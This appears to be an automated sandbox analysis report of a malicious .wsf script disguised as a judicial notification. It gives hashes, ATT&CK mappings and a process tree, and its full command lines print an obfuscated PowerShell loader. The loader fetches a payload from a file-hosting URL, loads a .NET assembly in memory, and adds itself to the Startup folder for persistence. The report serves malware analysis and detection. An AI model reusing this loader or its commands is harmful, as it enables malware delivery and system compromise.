7548f1ad49f6fd2a5e2aba00613274674f2ca6424dbacb41717098ecea852f70

General

Target

13112024_1857_RAMA_J_DEL_PODER_PUBLICO_NOTIFICACION_ELECTRONICA_RAD_129939214091249_POR_FAVOR_CONFIRMAR_RECIBIDO.wsf
Size

1KB
MD5

817379a5c3f383c5586acd71d5e8adf5
SHA1

6139bcd7317b3a3de045b1da994f8924d6c79f84
SHA256

7548f1ad49f6fd2a5e2aba00613274674f2ca6424dbacb41717098ecea852f70
SHA512

d2d75ef1296712a678ab60b0d3b476d228bdd5c10b8e9b75c7dad91a5ce14d0632a176271623366b501405c6dbee7d1c79d0ebbd389b04073c18cb2020d1da7e

Score

10^/10

discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
3	1508	WScript.exe
4	1508	WScript.exe
8	2088	powershell.exe
9	2088	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2736	powershell.exe
1932	powershell.exe
2088	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CJJ.vbs	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2812	cmd.exe
2836	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2836	PING.EXE

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2736	powershell.exe
1932	powershell.exe
2088	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2736	powershell.exe
Token: SeDebugPrivilege	1932	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1508 wrote to memory of 2812	1508	WScript.exe	31
PID 1508 wrote to memory of 2812	1508	WScript.exe	31
PID 1508 wrote to memory of 2812	1508	WScript.exe	31
PID 2812 wrote to memory of 2836	2812	cmd.exe	33
PID 2812 wrote to memory of 2836	2812	cmd.exe	33
PID 2812 wrote to memory of 2836	2812	cmd.exe	33
PID 2812 wrote to memory of 2736	2812	cmd.exe	34
PID 2812 wrote to memory of 2736	2812	cmd.exe	34
PID 2812 wrote to memory of 2736	2812	cmd.exe	34
PID 1508 wrote to memory of 1932	1508	WScript.exe	35
PID 1508 wrote to memory of 1932	1508	WScript.exe	35
PID 1508 wrote to memory of 1932	1508	WScript.exe	35
PID 1932 wrote to memory of 2088	1932	powershell.exe	37
PID 1932 wrote to memory of 2088	1932	powershell.exe	37
PID 1932 wrote to memory of 2088	1932	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\13112024_1857_RAMA_J_DEL_PODER_PUBLICO_NOTIFICACION_ELECTRONICA_RAD_129939214091249_POR_FAVOR_CONFIRMAR_RECIBIDO.wsf"
1⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\13112024_1857_RAMA_J_DEL_PODER_PUBLICO_NOTIFICACION_ELECTRONICA_RAD_129939214091249_POR_FAVOR_CONFIRMAR_RECIBIDO.wsf', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:2812
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 10
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\13112024_1857_RAMA_J_DEL_PODER_PUBLICO_NOTIFICACION_ELECTRONICA_RAD_129939214091249_POR_FAVOR_CONFIRMAR_RECIBIDO.wsf', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.JJC.vbs')')
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdacUtpbWFnZVVybCA9IEQnKycwNmh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20nKycvYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdCcrJ0ljTycrJ2NfVDM1dyZwa192aWQ9ZmQ0ZicrJzYxNGJiMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgRDA2O1pxS3dlYkNsaWVudCA9IE5ldy1PYmplY3QgUycrJ3lzdGVtLk5ldC5XZWJDbGknKydlbnQ7WicrJ3FLaW1hZ2VCeXRlcyA9IFpxSycrJ3dlYkNsaWVudC5Eb3dubG9hZERhdGEoWnFLaW1hZ2VVcmwpO1pxS2ltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFpxS2ltYWdlQnl0ZXMpOycrJ1pxS3N0YXJ0RmxhZyA9IEQwJysnNjw8QkFTRTY0X1NUQVJUPj5EMDY7WnFLZW5kRmxhZyA9IEQwNjw8QkFTRTY0X0VORD4+RDA2O1pxS3N0YXJ0SW5kZXggPSBacUtpbScrJ2FnZVRleHQnKycuSW5kZXhPZihacUtzdGFydEZsYWcpO1pxJysnS2VuZEluZGUnKyd4ICcrJz0gWnFLaW1hZ2VUZXh0LkluZGV4T2YoWnFLZW5kRmxhZyk7WnFLc3RhcnRJbmRlJysneCAtJysnZ2UgMCAtYW5kIFpxS2VuZEluZGV4IC1ndCBacUtzdGFydEluZGV4O1pxS3N0YXJ0SW5kZXggKz0gWnFLc3RhcnRGbGFnLkxlbmd0aDtacUtiYXNlNjQnKydMJysnZW5ndGgnKycgPSBacUtlbmRJbmRleCAtIFpxS3N0YXJ0SW5kZXg7WnFLYmFzZTY0Q29tbWFuZCA9IFpxS2ltYWdlVGV4dC5TdWJzdHJpbmcoWnFLc3RhcnRJbmRleCwgWnFLYmFzZTY0TGVuZ3RoKTtacUtiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChacUtiJysnYXNlNjRDb21tYW5kJysnLlRvQ2hhckEnKydycmF5KCkgUEk2IEZvcicrJ0VhY2gtT2JqZWN0IHsgWnFLXyB9KVstMScrJy4uLShaJysncUtiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldO1pxS2NvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoWnFLYmFzZTY0UicrJ2V2ZXJzZWQpO1pxS2xvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWYnKydsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChacUtjb21tYW5kQnknKyd0ZXMpO1onKydxS3ZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXQnKydNJysnZXRob2QoRDA2VkFJRDA2KTtacUt2YWlNZXRob2QuSW52b2tlKFpxS251bGwsIEAoRDA2MC8ybDJnaS9kL2VlLmV0c2EnKydwLy86c3B0dGhEMDYsIEQwNmRlc2F0aXZhZG9EMDYsIEQwNmQnKydlc2F0aXZhZG9EMDYsIEQnKycwNmRlcycrJ2F0aXZhZG9EMDYsIEQwNk1TQnVpbGREMDYsIEQwNmRlc2F0aXZhZG9EMDYsIEQwNmRlc2F0aXZhZG9EMDYsRDA2ZGVzJysnYXRpdmFkb0QwNixEMDZkZXNhdGl2YWRvRDA2LEQwNmRlc2F0aXZhJysnZG9EMDYsRDA2ZGVzYXRpdmFkb0QwNixEMDZkZXNhdGl2YWRvRDA2LEQwNjFEMDYsRDA2ZGVzYXRpdmFkb0QwNikpOycpLnJlcExhY0UoJ0QwNicsW3NUckluZ11bY2hBUl0zOSkucmVwTGFjRSgnWnFLJywnJCcpLnJlcExhY0UoJ1BJNicsJ3wnKSB8JiggJHZlUmJPU2VwUkVGRXJFbmNlLlRvc3RSSU5HKClbMSwzXSsneCctam9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('ZqKimageUrl = D'+'06https://1017.filemail.com'+'/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQt'+'IcO'+'c_T35w&pk_vid=fd4f'+'614bb209c62c1730945176a0904f D06;ZqKwebClient = New-Object S'+'ystem.Net.WebCli'+'ent;Z'+'qKimageBytes = ZqK'+'webClient.DownloadData(ZqKimageUrl);ZqKimageText = [System.Text.Encoding]::UTF8.GetString(ZqKimageBytes);'+'ZqKstartFlag = D0'+'6<<BASE64_START>>D06;ZqKendFlag = D06<<BASE64_END>>D06;ZqKstartIndex = ZqKim'+'ageText'+'.IndexOf(ZqKstartFlag);Zq'+'KendInde'+'x '+'= ZqKimageText.IndexOf(ZqKendFlag);ZqKstartInde'+'x -'+'ge 0 -and ZqKendIndex -gt ZqKstartIndex;ZqKstartIndex += ZqKstartFlag.Length;ZqKbase64'+'L'+'ength'+' = ZqKendIndex - ZqKstartIndex;ZqKbase64Command = ZqKimageText.Substring(ZqKstartIndex, ZqKbase64Length);ZqKbase64Reversed = -join (ZqKb'+'ase64Command'+'.ToCharA'+'rray() PI6 For'+'Each-Object { ZqK_ })[-1'+'..-(Z'+'qKbase64Comma'+'nd.Length)];ZqKcommandBytes = [System.Convert]::FromBase64String(ZqKbase64R'+'eversed);ZqKloadedAssembly = [System.Ref'+'lection.Assembly]::Load(ZqKcommandBy'+'tes);Z'+'qKvaiMethod = [dnlib.IO.Home].Get'+'M'+'ethod(D06VAID06);ZqKvaiMethod.Invoke(ZqKnull, @(D060/2l2gi/d/ee.etsa'+'p//:sptthD06, D06desativadoD06, D06d'+'esativadoD06, D'+'06des'+'ativadoD06, D06MSBuildD06, D06desativadoD06, D06desativadoD06,D06des'+'ativadoD06,D06desativadoD06,D06desativa'+'doD06,D06desativadoD06,D06desativadoD06,D061D06,D06desativadoD06));').repLacE('D06',[sTrIng][chAR]39).repLacE('ZqK','$').repLacE('PI6','|') |&( $veRbOSepREFErEnce.TostRING()[1,3]+'x'-joIn'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2088

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

System Network Configuration Discovery

1

T1016

Internet Connection Discovery

1

T1016.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
39b791a94ce8a1b7836ec9f510b1e2a2

SHA1
77a6ee59aed04dd4cc47c80ee8d76e7945b761bf

SHA256
6df5f9fada66d0388428dc78b965a6796e9c665c9ccd9edede3b792feb48ab6b

SHA512
bd5d9b7596a65031abc105f9dac0f84ec98b1bb0ed6a85686c6c6cc58d8e15be18e57ca5b62b454abc6875d8af58760ca14247d0e5129f7900ecee8b34e27dcc

Download Submit
memory/1932-19-0x000000001B4D0000-0x000000001B7B2000-memory.dmp

Filesize
2.9MB

Download
memory/1932-20-0x00000000021D0000-0x00000000021D8000-memory.dmp

Filesize
32KB

Download
memory/2736-5-0x000007FEF515E000-0x000007FEF515F000-memory.dmp

Filesize
4KB

Download
memory/2736-6-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/2736-7-0x0000000001E80000-0x0000000001E88000-memory.dmp

Filesize
32KB

Download
memory/2736-8-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-11-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-12-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-10-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-9-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download
memory/2736-13-0x000007FEF4EA0000-0x000007FEF583D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing